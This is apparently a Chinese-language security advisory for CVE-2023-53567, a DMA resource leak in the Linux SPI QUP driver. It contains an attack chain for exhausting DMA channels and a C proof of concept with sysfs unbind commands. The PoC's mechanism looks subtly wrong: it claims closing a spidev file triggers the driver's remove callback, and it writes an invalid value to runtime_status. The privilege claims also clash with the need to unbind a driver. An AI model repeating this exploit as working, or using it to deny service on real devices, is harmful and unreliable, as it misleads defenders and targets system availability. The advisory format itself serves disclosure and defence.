CVE-2023-53567 Linux内核SPI QUP驱动DMA资源泄漏漏洞

漏洞信息

漏洞编号

CVE-2023-53567

漏洞类型

资源泄漏（Resource Leak）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 SPI QUP驱动（spi-qup）

漏洞概述

CVE-2023-53567是Linux内核中SPI QUP（Qualcomm Universal Peripheral）驱动存在的一个资源泄漏漏洞。该漏洞位于平台驱动的remove回调函数的错误处理路径中。当设备移除过程中发生错误时，驱动会提前返回，导致DMA（直接内存访问）资源未被正确释放。由于这些资源在后续过程中不会被重新尝试释放，因此会形成永久性的资源泄漏。

SPI QUP驱动是高通（Qualcomm）平台上用于SPI（串行外设接口）通信的核心驱动组件，广泛应用于各类嵌入式设备和移动终端中。该漏洞的影响主要体现在系统可用性方面——随着时间的推移，反复触发该错误路径将导致DMA通道和内存资源不断累积泄漏，最终可能耗尽系统资源，导致系统不稳定或服务不可用。

该漏洞的CVSS评分为5.5，属于中危级别。攻击者需要本地低权限访问权限即可触发，无需用户交互。虽然机密性和完整性不受影响，但高可用性影响意味着在资源受限的嵌入式系统中，该漏洞可能导致严重的服务中断问题。该漏洞已在Linux内核主线及多个稳定版本中通过补丁修复，修复方案为：在错误路径中仅跳过硬件禁用操作（当唤醒设备失败时），但仍需执行DMA资源的清理释放操作。

技术细节

该漏洞的根本原因在于Linux内核SPI QUP驱动的platform_driver的remove回调函数（spi_qup_remove）中的错误处理逻辑不当。具体技术细节如下：

1. **问题代码路径**：在spi_qup_remove函数中，当尝试唤醒设备（pm_runtime_get_sync）失败时，驱动会直接返回错误码，而跳过了后续的DMA资源释放代码（如dma_release_channel等调用）。

2. **资源泄漏机制**：SPI QUP驱动在probe阶段会申请DMA通道和相关内存资源，这些资源需要在remove阶段对应释放。当remove的错误路径提前返回时，DMA通道描述符、SG列表、映射的DMA缓冲区等资源将永久驻留在系统中。

3. **影响放大效应**：由于该泄漏是永久性的且不可恢复，在设备热插拔场景或驱动反复加载/卸载的场景下（如容器环境、模块频繁加载等），泄漏的资源会不断累积。DMA通道在内核中属于有限资源，当所有DMA通道被耗尽后，新的SPI设备将无法正常工作。

4. **修复方案**：内核补丁将错误处理逻辑修改为：仅在唤醒设备失败时跳过硬件禁用操作（因为设备可能处于休眠状态），但仍然执行DMA资源的清理释放流程，确保资源不会泄漏。

5. **利用条件**：攻击者需要本地访问权限（PR:L），能够触发SPI QUP驱动的remove路径，例如通过手动卸载内核模块、触发设备热拔插事件，或利用其他驱动绑定/解绑机制。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标系统的本地低权限访问权限。由于漏洞的攻击向量为本地（AV:L），且权限要求为低（PR:L），普通用户账户即可利用此漏洞。

STEP 2

步骤2：定位SPI QUP设备

在高通平台上识别SPI QUP驱动管理的设备节点，通常位于/dev/spidev*或/sys/bus/platform/drivers/spi_qup/目录下。确认目标系统运行受影响版本的Linux内核。

STEP 3

步骤3：触发错误路径

通过sysfs或设备操作将SPI QUP设备置于异常电源状态（如runtime PM失败状态），使得在remove回调中pm_runtime_get_sync调用失败，从而触发提前返回的错误路径。

STEP 4

步骤4：触发资源泄漏

执行驱动解绑操作（unbind）或设备移除操作，触发spi_qup_remove回调。由于错误路径跳过了DMA资源释放代码，DMA通道和相关内存资源被永久泄漏。

STEP 5

步骤5：资源耗尽导致拒绝服务

重复执行步骤3-4，反复触发资源泄漏。随着DMA通道不断被消耗，系统最终将无法分配新的DMA资源，导致SPI通信功能完全失效，系统可用性受到严重影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53567: Triggering DMA resource leak in SPI QUP driver
// This PoC demonstrates how to trigger the vulnerable error path

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <errno.h>

// Step 1: Find the SPI QUP device (typically /dev/spidev* on Qualcomm platforms)
// The device path may vary based on the platform
#define SPI_DEVICE "/dev/spidev0.0"

int main(int argc, char *argv[]) {
    int fd;
    int ret;

    printf("[*] CVE-2023-53567 PoC - SPI QUP DMA Resource Leak\n");
    printf("[*] Attempting to trigger vulnerable remove path\n\n");

    // Step 2: Open the SPI device to acquire a reference
    fd = open(SPI_DEVICE, O_RDWR);
    if (fd < 0) {
        printf("[-] Cannot open %s: %s\n", SPI_DEVICE, strerror(errno));
        printf("[*] This PoC requires a Qualcomm platform with SPI QUP driver\n");
        printf("[*] Alternative: Use driver bind/unbind via sysfs\n");
        return 1;
    }
    printf("[+] Opened SPI device: %s (fd=%d)\n", SPI_DEVICE, fd);

    // Step 3: Trigger the error path by manipulating device state
    // Force pm_runtime to fail by putting device into a bad state
    // This can be done via sysfs:
    // echo "suspend" > /sys/devices/.../power/control  (before close)
    // Then close the device to trigger remove path

    // Step 4: Close device to trigger remove callback
    // If device is in a state where pm_runtime_get_sync fails,
    // the remove function will skip DMA cleanup -> resource leak
    printf("[*] Closing device to trigger remove callback...\n");
    ret = close(fd);
    if (ret < 0) {
        printf("[-] Close failed: %s\n", strerror(errno));
    }

    printf("[*] If the device was in a bad power state, DMA resources are now leaked\n");
    printf("[*] Repeat this process to accumulate leaked DMA channels\n");
    printf("[*] Check: cat /sys/kernel/debug/dmaengine/dma-channel-list\n");

    return 0;
}

/*
 * Alternative trigger method via sysfs (driver bind/unbind):
 *
 * # Find the SPI QUP platform device
 * ls /sys/bus/platform/drivers/spi_qup/
 *
 * # Bind the device first (if not already bound)
 * echo "<device_name>" > /sys/bus/platform/drivers/spi_qup/bind
 *
 * # Force device into runtime suspend failure state
 * echo "disabled" > /sys/devices/.../spi_qup/power/runtime_status
 *
 * # Unbind to trigger remove with error path
 * echo "<device_name>" > /sys/bus/platform/drivers/spi_qup/unbind
 *
 * # Check for leaked DMA channels
 * cat /sys/kernel/debug/dmaengine/dma-channel-list
 *
 * Note: The actual exploitability depends on the specific kernel version
 * and platform configuration. This PoC is for educational/research purposes only.
 */

影响范围

Linux kernel < 6.6（包含spi-qup驱动的主线版本）

Linux kernel 6.6.x（受影响）

Linux kernel 6.1.x LTS（受影响）

Linux kernel 5.15.x LTS（受影响）

Linux kernel 5.10.x LTS（受影响）

Linux kernel 5.4.x LTS（受影响）

所有使用Qualcomm平台且未应用补丁的内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户对platform driver bind/unbind sysfs接口的访问权限，通过udev规则或文件系统权限控制；2）监控DMA通道的使用情况，设置告警阈值，及时发现资源泄漏；3）避免在运行时频繁进行SPI设备的插拔或驱动的加载卸载操作；4）对于嵌入式设备，确保pm_runtime管理策略配置正确，避免设备进入异常的电源状态。